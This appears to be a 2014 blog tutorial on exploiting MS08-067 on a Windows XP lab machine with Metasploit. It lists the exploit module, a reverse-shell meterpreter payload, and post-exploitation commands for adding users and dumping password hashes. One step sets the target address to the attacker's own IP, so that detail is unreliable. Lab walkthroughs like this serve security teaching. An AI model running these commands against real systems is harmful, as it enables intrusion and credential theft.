Thursday, May 29, 2014

Metasploit: Gaining Access using MS08-067 (CVE-2008-4250)

Setup details
Victim(Windows XP SP3): 192.168.56.101
Attack(Kali Linux):             192.168.56.102

Use below commands to launch an exploit.
search command can be used to search desired exploit, payload etc.
use      to use required exploit
set       set options accordingly (LHOST, LPORT, RHOST,RPORT,PAYLOAD etc.)
run/exploit    launch exploit
meterpreter  shell to execute commands in the context of victim
msf> search smb
msf> use exploit/windows/smb/ms08_067_netapi
msf> show options
msf> set RHOST 192.168.56.102
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> exploit

Check if all the options related to the exploit are set properly.
Launch the exploit once all the parameter are set properly

Exploit is successful and we are already on meterpreter prompt.

Details of the victim Operating System

Once we have access to the victim there are many post exploitation techniques like Privilege Escalation, Maintaining Access, Clearing Logs etc.
meterpreter> screenshot
meterpreter> migrate
To add users
meterpreter> use incognito
meterpreter> help incognito
Dump Users and LM/NTLM hashes
meterpreter> hashdump

Same steps can be followed for different exploits. To use different exploit execute below command and set options accordingly.
use exploit/windows/browser/ie_aurora

Other useful blogs
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Vulnerability details
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250